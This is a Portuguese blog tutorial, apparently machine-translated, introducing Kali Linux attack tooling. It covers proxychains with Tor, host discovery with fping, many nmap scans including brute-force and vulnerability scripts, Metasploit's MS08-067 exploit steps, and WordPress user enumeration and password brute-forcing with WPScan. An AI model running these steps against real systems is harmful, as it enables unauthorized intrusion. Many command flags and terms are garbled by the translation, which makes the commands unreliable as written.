O Kali Linux é uma distribuição Linux baseada em Debian, destinada a testes avançados de penetração e auditoria de segurança. Kali contém várias centenas de ferramentas que são voltadas para várias tarefas de segurança da informação, como teste de penetração, pesquisa de segurança, forense de computador e engenharia reversa.
- Kali
- Parrot: Baseado em Debian – https://www.parrotsec.org/
- Athena: Blackarch-https://github.com/athena-os
1. Use proxychains e tor para visitar a internet
1.1 Configurar proxychains
root@Kali:~# vi /etc/proxychains.conf
Você pode escolher entre dinâmico_chain, stric_chain ou random_chaim. Dynamic_chain serão preferidos.
# proxychains.conf VER 3.1
#
# HTTP, SOCKS4, SOCKS5 tunneling proxifier with DNS.
#
# The option below identifies how the ProxyList is treated.
# only one option should be uncommented at time,
# otherwise the last appearing option will be accepted
#
dynamic_chain
#
# Dynamic - Each connection will be done via chained proxies
# all proxies chained in the order as they appear in the list
# at least one proxy must be online to play in chain
# (dead proxies are skipped)
# otherwise EINTR is returned to the app
#
#strict_chain
#
# Strict - Each connection will be done via chained proxies
# all proxies chained in the order as they appear in the list
# all proxies must be online to play in chain
# otherwise EINTR is returned to the app
#
#random_chain
#
# Random - Each connection will be done via random proxy
# (or proxy chain, see chain_len) from the list.
# this option is good to test your IDS :)
Você também pode anexar parte da sua lista de servidores proxy conhecida no final do arquivo proxychains.conf.
# ProxyList format
# type host port (user pass)
# (values separated by 'tab' or 'blank')
#
#
# Examples:
#
# socks5 192.168.67.78 1080 lamer secret
# http 192.168.89.3 8080 justu hidden
# socks4 192.168.1.49 1080
# http 192.168.39.93 8080
#
#
# proxy types: http, socks4, socks5
# ( auth types supported: "basic"-http "user/pass"-socks )
#
(ProxyList)
# add proxy here ...
# meanwile
# defaults set to "tor"
socks4 127.0.0.1 9050
socks5 98.26.2.3 1893
socks5 76.22.86.10 1658
1.2 Instale o Tor
Você precisará adicionar uma fonte de versão correta no arquivo /etc/apt/sorces.list. Caso contrário, sua instalação falhará.
echo "deb http://http.kali.org/kali kali-rolling main contrib non-free" > /etc/apt/sources.list && apt-get update && apt-get install tor -y && apt autoremove -y
1.3 Use proxychains para acessar a Internet
Você pode executar uma varredura NMAP usando proxychains, que forçará a varredura a percorrer um dos proxies da sua lista digitando o seguinte comando no terminal:
proxychains nmap scanme.nmap.org
Você também pode testar proxychains com o Firefox:
Proxychains Firefox www.duckduckgo.com
Proxychains Curl icanhazip.com
Vídeo do YouTube:
https://www.youtube.com/watch?v=6u0r8nnp5nc
Usando proxychains para iniciar o msfconsole:
root@kali:~# proxychains msfconsole
ProxyChains-3.1 (http://proxychains.sf.net)
|DNS-request| 0.0.0.0
|S-chain|-<>-127.0.0.1:9050-<--timeout
|DNS-response|: 0.0.0.0 is not exist
, ,
/ \
((__---,,,---__))
(_) O O (_)_________
\ _ / |\
o_o \ M S F | \
\ _____ | *
||| WW |||
||| |||
Tired of typing 'set RHOSTS'? Click & pwn with Metasploit Pro
-- type 'go_pro' to launch it now.
=( metasploit v4.7.0-2013082802 (core:4.7 api:1.0)
+ -- --=( 1161 exploits - 641 auxiliary - 180 post
+ -- --=( 310 payloads - 30 encoders - 8 nops
msf >
2. Descubra máquinas vivas na rede de destino
root@kali:~# fping -g -r 0 -s 192.168.2.0/24 | grep alive 192.168.2.1 is alive 192.168.2.2 is alive 192.168.2.4 is alive 192.168.2.31 is alive 192.168.2.50 is alive 192.168.2.200 is alive 254 targets 6 alive 248 unreachable 0 unknown addresses 248 timeouts (waiting for response) 254 ICMP Echos sent 6 ICMP Echo Replies received 0 other ICMP received 4.49 ms (min round trip time) 4.92 ms (avg round trip time) 5.14 ms (max round trip time) 3.288 sec (elapsed real time)
3. Use o NMAP para digitalizar metas
3.1 Digitalizar um único endereço de destino
NMAP 192.168.0.100
3.2 Digitam vários endereços de destino
NMAP 192.168.0.100 192.168.0.105
3.3 Digitalize o endereço de destino dentro de um intervalo
NMAP 192.168.0.100-110
3.4 Digitalize um determinado segmento de rede em que o endereço de destino está localizado
NMAP 192.168.0.0/24
3.5 Digitalize todos os endereços de destino nos destino da lista de hosts.txt
nmap -il d: \ Targets.txt
3.6 Digitalize todos os endereços de destino, exceto um endereço alvo
NMAP 192.168.0.0/24 -exclude 192.168.109.105
3.7 Digitalizar o endereço de destino que não seja o endereço de destino em um arquivo
NMAP 192.168.0.0/24 -excludefile d: \ Targets.txt
3.8 Digitam os 21, 22, 23 e 80 portos de um endereço de destino
NMAP 192.168.0.100 -P 21,22,23,80
3.9 Rastreamento de roteamento do endereço de destino
NMAP –TRACEROUTE 192.168.0.105
3.10 Digitalizar a situação on -line do segmento C, onde o endereço de destino está localizado
NMAP -SP 192.168.0.0/24
3.11 Sistema operacional Reconhecimento de impressão digital do endereço de destino
NMAP -O 192.168.0.105
3.12 Detecção da versão de serviço fornecida pelo endereço de destino
NMAP -SV 192.168.0.105
3.13 Detectando o status do firewall
Em combate real, o estado do firewall pode ser detectado pela digitalização da FIN. A varredura FIN é usada para identificar se a porta está fechada.
NMAP -SF -T4 192.168.0.105
3.14 AUTENTICAÇÃO Digitalização: use –script = auth para aplicar a detecção de senha fraca no host de destino ou segmento de rede em que o host de destino está localizado.
NMAP –Script = Auth 192.168.0.105
3.15 Ataque de força bruta: o NMAP tem a função de rachaduras de força bruta, que podem adivinhar o banco de dados, SMB, SNMP, etc.
NMAP –Script = Brute 192.168.0.105
3.16 Digitalização para vulnerabilidades comuns: o NMAP tem a função da varredura de vulnerabilidades, que pode verificar se existem vulnerabilidades comuns no host de destino ou no segmento de rede.
NMAP -Script = Vuln 192.168.0.105
3.17 Vescificação de serviço de aplicativo: o NMAP possui muitos scripts de digitalização de serviços de aplicativos comuns, como serviço VNC, serviço MySQL, serviço telnet, serviço rsync, etc. Tome o serviço VNC como exemplo
NMAP –Script = RealVNC-Auth-ByPass 192.168.0.105
3.18 Detecte mais serviços na LAN:
NMAP -N -P 445 –Script = Broadcast 192.168.0.105
3.19 Análise WHOIS: Use bancos de dados ou recursos de terceiros para consultar as informações de endereço de destino, como a Whois Analysis
NMAP -Script Externo Baidu.com
root@kali:~# nmap -T4 -O 192.168.2.31 192.168.2.200
Starting Nmap 7.60 ( https://nmap.org ) at 2019-01-19 21:35 EST
Nmap scan report for 192.168.2.31
Host is up (0.31s latency).
Not shown: 990 closed ports
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
514/tcp filtered shell
3389/tcp open ms-wbt-server
5357/tcp open wsdapi
7070/tcp open realserver
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
Device type: general purpose
Running: Microsoft Windows XP|7|2012
OS CPE: cpe:/o:microsoft:windows_xp::sp3 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_server_2012
OS details: Microsoft Windows XP SP3, Microsoft Windows XP SP3 or Windows 7 or Windows Server 2012
Nmap scan report for 192.168.2.200
Host is up (0.12s latency).
Not shown: 995 closed ports
PORT STATE SERVICE
80/tcp open http
139/tcp open netbios-ssn
443/tcp open https
445/tcp open microsoft-ds
514/tcp filtered shell
Aggressive OS guesses: Actiontec MI424WR-GEN3I WAP (99%), DD-WRT v24-sp2 (Linux 2.4.37) (98%), Linux 3.2 (97%), Linux 4.4 (97%), Microsoft Windows XP SP3 or Windows 7 or Windows Server 2012 (96%), Microsoft Windows XP SP3 (96%), BlueArc Titan 2100 NAS device (91%)
No exact OS matches for host (test conditions non-ideal).
OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 2 IP addresses (2 hosts up) scanned in 136.89 seconds
root@kali:~#
4. MSF – Metaspoit
4.1 Uso básico e etapas
- Pesquise SMB
- Use explorar/windows/sMb/ms08_067_netapi
- mostrar opções
- Conjunto assado 192.168.230.145
- Defina o destino 41
- explorar
4.2 YouTube – Kali Metasploit Explorit FTP Service no vsftpd:
https://www.youtube.com/watch?v=1wabyeaxppi
4.3 YouTube – Kali Metasploit Explorar Serviço Samba:
https://www.youtube.com/watch?v=pa6bql7jzhc
4.4. WPScan para atacar o WordPress
Use o WPScan para iniciar um site simples de ataque WordPress
root@localhost: ~# wpscan -u 10.94.200.81
Liste o usuário do WordPress
root@localhost: ~# wpscan -u 10.94.200.81 -EU vp
Use a conta do WordList to Brute WordPress
root@localhost: ~# wpscan -u 10.94.200.81 -eu –wordlist /usr/share/wordlists/metasploit/common-roots.txt
Vídeo do YouTube:
https://www.youtube.com/watch?v=YVWSPC1XRII
4.5. Explorar servidores Windows 7 ou Windows 2008
Vídeo do YouTube: Usando a vulnerabilidade EternalBlue para explorar o Windows 2008 Server
https://www.youtube.com/watch?v=wx1aw_4rndg

Luis es un experto en Ciberseguridad, Computación en la Nube, Criptomonedas e Inteligencia Artificial. Con amplia experiencia en tecnología, su objetivo es compartir conocimientos prácticos para ayudar a los lectores a entender y aprovechar estas áreas digitales clave.